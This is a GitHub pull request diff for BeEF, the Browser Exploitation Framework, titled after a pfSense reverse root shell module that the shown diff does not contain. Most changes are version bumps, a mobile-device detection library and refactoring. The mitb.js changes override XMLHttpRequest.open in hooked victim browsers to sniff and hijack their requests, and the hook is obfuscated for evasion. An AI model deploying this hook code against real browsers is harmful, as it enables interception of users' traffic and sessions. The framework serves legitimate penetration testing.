Merge pull request #823 from bmantra/master

pfSense reverse root remote shell #812

BeEFLive.sh

@@ -1,110 +1,2 @@
-#!/bin/bash
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'home/beef/doc/COPYING' for copying permission
-#
-
-   
-#
-# This is the auto startup script for the BeEF Live CD. 
-# IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: https://github.com/beefproject/beef/downloads
-#
-# This script contains a few fixes to make BeEF play nicely with the way  
-# remastersys creates the live cd distributable as well as generating host keys 
-# to enable SSH etc. The script also make it easy for the user to update/start 
-# the BeEF server
-#
-clear
-echo "======================================"
-echo "          BeEF Live CD   "
-echo "======================================"
-echo ""
-echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
-echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
-echo "See the file 'home/beef/doc/COPYING' for copying permission"
-echo ""
-
-echo "Welcome to the BeEF Live CD" 
-echo "" 
-echo ""
-
-#
-# Check for SSH Host Keys - if they do not exist ask user if they should be 
-# created (remastersys has a habit of deleting them during Live CD Creation)
-#
-f1="/etc/ssh/ssh_host_rsa_key"
-if [ -f $f1 ]
-then
-	echo ""
-else 
-	echo -n "Would you like to enable ssh (y/N)? "
-	read var
-	
-	if [ $var = "y" ] ; then
-		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
-		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
-		 echo ""
-		 echo "Please provide a password for ssh user: beef"
-		 sudo passwd beef
-		 echo "ssh enabled"
-	fi
-fi
-echo ""
-
-#
-# Prompt the user if they would like to update BeEF and 
-# other components installed (such as sqlmap and msf)
-#
-echo -n "Check and install updates for BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	 cd /opt/beef
-	 git stash
-	 git pull
-fi
-echo ""
-
-echo -n "Check and install updates for msf and sqlmap (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
- 	 cd /opt/sqlmap
- 	 git stash
-	 git pull
-	 cd /opt/metasploit-framework
-	 git stash
-	 git pull
-fi
- 
- 
-#
-# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
-# (if they do not yet exist)
-#
-f1="beef"
-if [ -f $f1 ] ; then
-	echo ""
-else
-	ln -s /opt/beef/ beef
-	ln -s /opt/metasploit-framework/ msf
-	ln -s /opt/sqlmap/ sqlmap
-fi
-
-#
-# Prompt the user if they would like start BeEF
-#
-echo -n "Start BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	echo ""
-	echo "Starting BeEF..";
-	
-	cd /opt/beef
-	ruby beef -x
-fi
-
-
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.9-alpha
+0.4.4.1-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.9-alpha'
+    version: '0.4.4.1-alpha'
     debug: false
 
     restrictions:

core/bootstrap.rb

@@ -24,6 +24,7 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 

core/main/client/are.js

@@ -9,8 +9,39 @@ beef.are = {
    var Jools = require('jools');
    this.ruleEngine = new Jools();
   },
-  rules:[],
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
   commands:[],
   results:[]
 };
-beef.regCmp("beef.are");
+beef.regCmp("beef.are");

core/main/client/hardware.js

@@ -7,39 +7,15 @@
 beef.hardware = {
 
 	ua: navigator.userAgent,
-	
-	isWinPhone: function() {
-		return (this.ua.match('(Windows Phone)')) ? true : false;
-	},
-	
-	isIphone: function() {
-		return (this.ua.indexOf('iPhone') != -1) ? true : false;
-	},
-
-	isIpad: function() {
-		return (this.ua.indexOf('iPad') != -1) ? true : false;
-	},
-
-	isIpod: function() {
-		return (this.ua.indexOf('iPod') != -1) ? true : false;
-	},
 
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
 
-	isBlackBerry: function() {
-		return (this.ua.match('BlackBerry')) ? true : false;
-	},
-
 	isZune: function() {
 		return (this.ua.match('ZuneWP7')) ? true : false;
 	},
 
-	isKindle: function() {
-		return (this.ua.match('Kindle')) ? true : false;
-	},
-
 	isHtc: function() {
 		return (this.ua.match('HTC')) ? true : false;
 	},
@@ -48,10 +24,6 @@ beef.hardware = {
 		return (this.ua.match('Ericsson')) ? true : false;
 	},
 
-	isNokia: function() {
-		return (this.ua.match('Nokia')) ? true : false;
-	},
-
 	isMotorola: function() {
 		return (this.ua.match('Motorola')) ? true : false;
 	},
@@ -60,20 +32,57 @@ beef.hardware = {
 		return (this.ua.match('Nexus One')) ? true : false;
 	},
 
-	getName: function() {
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.browser.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
 
-		if (this.isNokia()) return 'Nokia';
-		if (this.isWinPhone()) return 'Windows Phone';
-		if (this.isBlackBerry()) return 'BlackBerry';
-		if (this.isIphone()) return 'iPhone';
-		if (this.isIpad()) return 'iPad';
-		if (this.isIpod()) return 'iPod';
-		if (this.isKindle()) return 'Kindle';
-		if (this.isHtc()) return 'HTC';
-		if (this.isMotorola()) return 'Motorola';
-		if (this.isZune()) return 'Zune';
-		if (this.isGoogle()) return 'Google';
-		if (this.isEricsson()) return 'Ericsson';
+	getMobileName: function() {
+                var ua = navigator.userAgent.toLowerCase();
+                if(DetectIphone())              { return "iPhone"};
+                if(DetectIpod())                { return "iPod Touch"};
+                if(DetectIpad())                { return "iPad"};
+		if (this.isHtc())               { return 'HTC'};
+		if (this.isMotorola())          { return 'Motorola'};
+		if (this.isZune())              { return 'Zune'};
+		if (this.isGoogle())            { return 'Google Nexus One'};
+		if (this.isEricsson())          { return 'Ericsson'};
+                if(DetectAndroidPhone())        { return "Android Phone"};
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation" };
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
 
 		return 'Unknown';
 	}

core/main/client/lib/mdetect.js

@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()

core/main/client/mitb.js

@@ -14,47 +14,30 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
-                    var portRegex = new RegExp(":[0-9]+");
-                    var portR = portRegex.exec(url);
-                    /*return :port*/
-                    var requestPort;
-
-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -63,26 +46,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -161,7 +137,7 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
@@ -181,14 +157,13 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -204,7 +179,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
@@ -223,11 +198,9 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
-
+            // the link is cross-domain, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 

core/main/handlers/modules/beefjs.rb

@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -74,6 +74,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
+            # @note set the hook file path
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -99,7 +102,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end

core/main/network_stack/assethandler.rb

@@ -24,6 +24,20 @@ module Handlers
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
